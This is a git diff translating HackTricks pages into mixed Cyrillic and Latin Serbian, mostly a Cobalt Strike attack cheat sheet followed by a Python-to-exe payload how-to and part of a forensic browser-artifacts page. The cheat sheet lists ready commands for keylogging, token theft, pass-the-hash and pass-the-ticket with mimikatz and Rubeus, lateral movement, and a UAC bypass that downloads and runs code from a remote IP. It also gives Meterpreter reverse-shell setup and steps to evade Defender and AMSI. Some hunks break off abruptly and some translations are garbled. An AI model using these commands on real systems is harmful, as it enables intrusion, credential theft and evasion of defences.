# Execute local .NET binary
+# Изврши локални .NET бинарни фајл
execute-assembly </path/to/executable.exe>
-# Screenshots
-printscreen # Take a single screenshot via PrintScr method
-screenshot # Take a single screenshot
-screenwatch # Take periodic screenshots of desktop
-## Go to View -> Screenshots to see them
+# Снимци екрана
+printscreen # Направи један снимак екрана помоћу PrintScr методе
+screenshot # Направи један снимак екрана
+screenwatch # Периодично прави снимке екрана
+## Идите на Приказ -> Снимци екрана да их видите
# keylogger
keylogger [pid] [x86|x64]
-## View > Keystrokes to see the keys pressed
+## Приказ > Притиснуте тастере да видите притиснуте тастере
# portscan
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Убаци акцију скенирања порта у други процес
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
-# Import Powershell module
+# Увези Powershell модул
powershell-import C:\path\to\PowerView.ps1
-powershell <just write powershell cmd here>
+powershell <овде унесите powershell команду>
-# User impersonation
-## Token generation with creds
-make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token generated with make_token
-## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
+# Имитација корисника
+## Генеришење токена са креденцијалима
+make_token [DOMAIN\user] [password] #Креирај токен за имитирање корисника у мрежи
+ls \\computer_name\c$ # Покушај коришћења генерисаног токена за приступ C$ на рачунару
+rev2self # Престани користити токен генерисан са make_token
+## Коришћење make_token генерише догађај 4624: Налог је успешно пријављен. Овај догађај је веома чест у Windows домену, али се може сужавати филтрирањем по типу пријаве. Као што је поменуто, користи LOGON32_LOGON_NEW_CREDENTIALS који је тип 9.
# UAC Bypass
-elevate svc-exe <listener>
-elevate uac-token-duplication <listener>
+elevate svc-exe <слушаоц>
+elevate uac-token-duplication <слушаоц>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
-## Steal token from pid
-## Like make_token but stealing the token from a process
-steal_token [pid] # Also, this is useful for network actions, not local actions
-## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token from steal_token
+## Укради токен из pid-а
+## Као make_token, али краде токен из процеса
+steal_token [pid] # Такође, ово је корисно за мрежне акције, а не локалне акције
+## Из документације API-ја знамо да овај тип пријаве "омогућава позиваоцу да клонира свој тренутни токен". Зато Beacon исписује Impersonated <current_username> - имитира наш клонирани токен.
+ls \\computer_name\c$ # Покушај коришћења генерисаног токена за приступ C$ на рачунару
+rev2self # Престани користити токен из steal_token
-## Launch process with nwe credentials
-spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
-## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
+## Покрени процес са новим креденцијалима
+spawnas [domain\username] [password] [listener] #Урадите то из директоријума са приступом за читање као: cd C:\
+## Као make_token, ово ће генерисати Windows догађај 4624: Налог је успешно пријављен, али са типом пријаве 2 (LOGON32_LOGON_INTERACTIVE). Детаљно ће бити наведен позиваоц (TargetUserName) и имитирани корисник (TargetOutboundUserName).
-## Inject into process
+## Убаци у процес
inject [pid] [x64|x86] [listener]
-## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
+## Са аспекта ОпСек-а: Не врши убацивање између различитих платформи осим ако заиста морате (нпр. x86 -> x64 или x64 -> x86).
-## Pass the hash
-## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
+## Пренеси хеш
+## Овај процес измене захтева патчовање меморије LSASS што је акција високог ризика, захтева привилегије локалног администратора и није све то изводљиво ако је омогућено Заштићено Процесно Светло (PPL).
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
-## Pass the hash through mimikatz
+## Пренеси хеш преко mimikatz-a
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
-## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
-steal_token <pid> #Steal token from process created by mimikatz
+## Без /run, mimikatz покреће cmd.exe, ако користите као корисник са Радном површином, видеће шел (ако користите као СИСТЕМ, све је у реду)
+steal_token <pid> #Укради токен из процеса који је креирао mimikatz
-## Pass the ticket
-## Request a ticket
-execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
-## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
-make_token <domain>\<username> DummyPass
-## Write the ticket in the attacker machine from a poweshell session & load it
-[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
-kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
-
-## Pass the ticket from SYSTEM
-## Generate a new process with the ticket
-execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
-## Steal the token from that process
+## Пренеси тикет
+## Захтевај тикет
+execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain>
+### Kreiranje nove sesije za prijavljivanje, zabeležite luid i processid
+execute-assembly C:\putanja\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
+### Ubacite karticu u generisanu sesiju za prijavljivanje
+execute-assembly C:\putanja\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
+### Na kraju, ukradite token iz tog novog procesa
steal_token <pid>
-## Extract ticket + Pass the ticket
-### List tickets
-execute-assembly C:\path\Rubeus.exe triage
-### Dump insteresting ticket by luid
-execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
-### Create new logon session, note luid and processid
-execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
-### Insert ticket in generate logon session
-execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
-### Finally, steal the token from that new process
-steal_token <pid>
+# Lateralno kretanje
+## Ako je token kreiran, biće korišćen
+jump [metoda] [cilj] [slušalac]
+## Metode:
+## psexec x86 Koristi uslugu za pokretanje artefakta Service EXE
+## psexec64 x64 Koristi uslugu za pokretanje artefakta Service EXE
+## psexec_psh x86 Koristi uslugu za pokretanje PowerShell jednolinije
+## winrm x86 Pokreće PowerShell skriptu putem WinRM-a
+## winrm64 x64 Pokreće PowerShell skriptu putem WinRM-a
-# Lateral Movement
-## If a token was created it will be used
-jump [method] [target] [listener]
-## Methods:
-## psexec x86 Use a service to run a Service EXE artifact
-## psexec64 x64 Use a service to run a Service EXE artifact
-## psexec_psh x86 Use a service to run a PowerShell one-liner
-## winrm x86 Run a PowerShell script via WinRM
-## winrm64 x64 Run a PowerShell script via WinRM
+remote-exec [metoda] [cilj] [komanda]
+## Metode:
+## psexec Daljinsko izvršavanje putem Service Control Manager-a
+## winrm Daljinsko izvršavanje putem WinRM-a (PowerShell)
+## wmi Daljinsko izvršavanje putem WMI-a
-remote-exec [method] [target] [command]
-## Methods:
-## psexec Remote execute via Service Control Manager
-## winrm Remote execute via WinRM (PowerShell)
-## wmi Remote execute via WMI
-
-## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+## Da biste izvršili beacon sa wmi (nije u jump komandi), samo otpremite beacon i izvršite ga
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
-# Pass session to Metasploit - Through listener
-## On metaploit host
+# Prosledi sesiju Metasploitu - Putem slušaoca
+## Na Metasploit hostu
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
-## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
+## Na Cobalt: Slušaoci > Dodaj i postavi Payload na Foreign HTTP. Postavi Host na 10.10.5.120, Port na 8080 i klikni Sačuvaj.
beacon> spawn metasploit
-## You can only spawn x86 Meterpreter sessions with the foreign listener.
+## Možete spawn-ovati samo x86 Meterpreter sesije sa foreign slušaocem.
-# Pass session to Metasploit - Through shellcode injection
-## On metasploit host
+# Prosledi sesiju Metasploitu - Putem ubrizgavanja shellcode-a
+## Na Metasploit hostu
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
-## Run msfvenom and prepare the multi/handler listener
+## Pokreni msfvenom i pripremi multi/handler slušaoca
-## Copy bin file to cobalt strike host
+## Kopiraj bin fajl na Cobalt Strike host
ps
-shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
+shinject <pid> x64 C:\Payloads\msf.bin #Ubrizgaj metasploit shellcode u x64 proces
-# Pass metasploit session to cobalt strike
-## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
-## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
+# Prosledi metasploit sesiju Cobalt Strike-u
+## Generiši stageless Beacon shellcode, idi na Attacks > Packages > Windows Executable (S), izaberi željeni slušalac, izaberi Raw kao Output tip i izaberi Use x64 payload.
+## Koristi post/windows/manage/shellcode_inject u metasploit-u da ubrizgaš generisani cobalt strike shellcode
# Pivoting
-## Open a socks proxy in the teamserver
+## Otvori socks proxy na teamserveru
beacon> socks 1080
-# SSH connection
-beacon> ssh 10.10.17.12:22 username password
+# SSH konekcija
+beacon> ssh 10.10.17.12:22 korisničko_ime lozinka
-## Avoiding AVs
+## Izbegavanje AV-a
### Artifact Kit
-Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
+Obično u `/opt/cobaltstrike/artifact-kit` možete pronaći kod i prekompilirane šablone (u `/src-common`) payloada koje će cobalt strike koristiti za generisanje binarnih beacona.
-Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
-
-After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
+Koristeći [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) sa generisanim backdoorom (ili samo sa kompiliranim šablonom) možete pronaći šta pokreće defender. Obično je to string. Stoga jednostavno izmenite kod koji generiše backdoor tako da taj string ne bude prisutan u finalnom binarnom fajlu.
+Nakon izmene koda, pokrenite `./build.sh` iz istog direktorijuma i kopirajte `dist-pipe/` folder na Windows klijentu u `C:\Tools\cobaltstrike\ArtifactKit`.
```
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
-
-Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
+Ne zaboravite da učitate agresivni skript `dist-pipe\artifact.cna` kako biste Cobalt Strike-u pokazali da koristi resurse sa diska koje želimo, a ne one koji su učitani.
### Resource Kit
-The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
-
-Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
+Folder ResourceKit sadrži predloške za skriptne payload-e Cobalt Strike-a, uključujući PowerShell, VBA i HTA.
+Korišćenjem [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) sa predlošcima možete pronaći šta se ne sviđa zaštitniku (u ovom slučaju AMSI) i izmeniti to:
```
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
```
+Modifikovanjem detektovanih linija može se generisati šablon koji neće biti uhvaćen.
-Modifying the detected lines one can generate a template that won't be caught.
-
-Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
-
-
-
-
-
-
-
+Ne zaboravite da učitate agresivni skriptu `ResourceKit\resources.cna` kako biste Cobalt Strike-u pokazali da koristite resurse sa diska koje želite, a ne one koji su učitani.
```bash
cd C:\Tools\neo4j\bin
neo4j.bat console
@@ -233,3 +205,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
+
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index ee0644afb..3a5995c3a 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -1,59 +1,58 @@
-# Certificates
+# Sertifikati
)
- 3 MAKE_FUNCTION 0
- 6 STORE_NAME 0 (hello_world)
- 9 LOAD_CONST 1 (None)
- 12 RETURN_VALUE
+1 0 LOAD_CONST 0 ()
+3 MAKE_FUNCTION 0
+6 STORE_NAME 0 (hello_world)
+9 LOAD_CONST 1 (None)
+12 RETURN_VALUE
>>>
>>> # Also disassemble that const being loaded (our function)
>>> dis.disassemble(code.co_consts[0])
- 2 0 LOAD_CONST 1 ('Hello {0}')
- 3 LOAD_ATTR 0 (format)
- 6 LOAD_FAST 0 (name)
- 9 CALL_FUNCTION 1
- 12 PRINT_ITEM
- 13 PRINT_NEWLINE
- 14 LOAD_CONST 0 (None)
- 17 RETURN_VALUE
+2 0 LOAD_CONST 1 ('Hello {0}')
+3 LOAD_ATTR 0 (format)
+6 LOAD_FAST 0 (name)
+9 CALL_FUNCTION 1
+12 PRINT_ITEM
+13 PRINT_NEWLINE
+14 LOAD_CONST 0 (None)
+17 RETURN_VALUE
```
+## Python u izvršnu datoteku
-## Python to Executable
+Da bismo započeli, pokazaćemo vam kako se payloadi mogu kompajlirati pomoću py2exe i PyInstaller alata.
-To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
-
-### To create a payload using py2exe:
-
-1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
-2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe.
-3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2.
+### Kako kreirati payload pomoću py2exe:
+1. Instalirajte py2exe paket sa [http://www.py2exe.org/](http://www.py2exe.org)
+2. Za payload (u ovom slučaju, nazvaćemo ga hello.py), koristite skriptu kao što je prikazano na slici 1. Opcija "bundle\_files" sa vrednošću 1 će sve, uključujući Python interpreter, spojiti u jednu izvršnu datoteku.
+3. Kada je skripta spremna, izdajemo komandu "python setup.py py2exe". Ovo će kreirati izvršnu datoteku, kao što je prikazano na slici 2.
```python
from distutils.core import setup
import py2exe, sys, os
@@ -192,10 +175,10 @@ import py2exe, sys, os
sys.argv.append('py2exe')
setup(
- options = {'py2exe': {'bundle_files': 1}},
- #windows = [{'script': "hello.py"}],
- console = [{'script': "hello.py"}],
- zipfile = None,
+options = {'py2exe': {'bundle_files': 1}},
+#windows = [{'script': "hello.py"}],
+console = [{'script': "hello.py"}],
+zipfile = None,
)
```
@@ -212,12 +195,10 @@ running py2exe
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
+### Kako napraviti payload koristeći PyInstaller:
-### To create a payload using PyInstaller:
-
-1. Install PyInstaller using pip (pip install pyinstaller).
-2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable.
-
+1. Instalirajte PyInstaller koristeći pip (pip install pyinstaller).
+2. Nakon toga, izdamo komandu "pyinstaller --onefile hello.py" (napomena da je 'hello.py' naš payload). Ovo će sve zapakovati u jedan izvršni fajl.
```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1
@@ -230,27 +211,26 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
-
-## References
+## Reference
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+Ako vas zanima **hakerska karijera** i hakovanje nehakabilnog - **zapošljavamo!** (_potrebno je tečno poznavanje poljskog jezika, pisano i govorno_).
{% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju oglašenu u HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Pogledajte [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
index 709547f0d..a917b43fa 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
@@ -1,21 +1,19 @@
-
-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-Here you can find interesting tricks for specific file-types and/or software:
+Ovde možete pronaći interesantne trikove za specifične tipove fajlova i/ili softvere:
{% page-ref page=".pyc.md" %}
@@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-
-
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 1db184503..c06dd0667 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -1,80 +1,80 @@
-# Browser Artifacts
+# Artifakti pregledača
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
-Other ways to support HackTricks:
+Drugi načini podrške HackTricks-u:
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
+* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Koristite [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) da biste lako izgradili i **automatizovali radne tokove** uz pomoć najnaprednijih alata zajednice na svetu.\
+Danas dobijte pristup:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-## Browsers Artifacts
+## Artifakti pregledača
-Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types.
+Artifakti pregledača uključuju različite vrste podataka koje čuvaju veb pregledači, kao što su istorija navigacije, obeleživači i keš podaci. Ovi artifakti se čuvaju u određenim fasciklama unutar operativnog sistema, razlikujući se po lokaciji i imenu u različitim pregledačima, ali uglavnom čuvajući slične vrste podataka.
-Here's a summary of the most common browser artifacts:
+Evo sažetka najčešćih artifakata pregledača:
-- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites.
-- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history.
-- **Bookmarks**: Sites saved by the user for quick access.
-- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user.
-- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis.
-- **Logins**: Stored login credentials.
-- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits.
-- **Browser Sessions**: Data related to open browser sessions.
-- **Downloads**: Records of files downloaded through the browser.
-- **Form Data**: Information entered in web forms, saved for future autofill suggestions.
-- **Thumbnails**: Preview images of websites.
-- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary.
+- **Istorija navigacije**: Prati posete korisnika veb sajtovima, korisno za identifikaciju poseta zlonamernim sajtovima.
+- **Podaci za automatsko popunjavanje**: Predlozi na osnovu čestih pretraga, pružajući uvide kada se kombinuju sa istorijom navigacije.
+- **Obeleživači**: Sajtovi koje je korisnik sačuvao radi brzog pristupa.
+- **Proširenja i dodaci**: Proširenja pregledača ili dodaci instalirani od strane korisnika.
+- **Keš**: Čuva veb sadržaj (npr. slike, JavaScript fajlove) radi poboljšanja vremena učitavanja sajtova, vredno za forenzičku analizu.
+- **Prijave**: Sačuvani podaci za prijavljivanje.
+- **Favikoni**: Ikone povezane sa veb sajtovima, prikazuju se na karticama i obeleživačima, korisne za dodatne informacije o posetama korisnika.
+- **Sesije pregledača**: Podaci vezani za otvorene sesije pregledača.
+- **Preuzimanja**: Zapisi o fajlovima preuzetim putem pregledača.
+- **Podaci o obrascima**: Informacije unete u veb obrasce, sačuvane za buduće predloge automatskog popunjavanja.
+- **Sličice**: Prikazne slike veb sajtova.
+- **Custom Dictionary.txt**: Reči dodate od strane korisnika u rečnik pregledača.
## Firefox
-Firefox organizes user data within profiles, stored in specific locations based on the operating system:
+Firefox organizuje korisničke podatke unutar profila, koji se čuvaju na određenim lokacijama u zavisnosti od operativnog sistema:
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
-A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted.
+U direktorijumima se nalazi `profiles.ini` fajl koji sadrži profile korisnika. Podaci svakog profila se čuvaju u fascikli čije ime odgovara vrednosti `Path` promenljive unutar `profiles.ini`, a nalazi se u istom direktorijumu kao i sam `profiles.ini`. Ako fascikla profila nedostaje, možda je obrisana.
-Within each profile folder, you can find several important files:
+Unutar svake fascikle profila, možete pronaći nekoliko važnih fajlova:
-- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
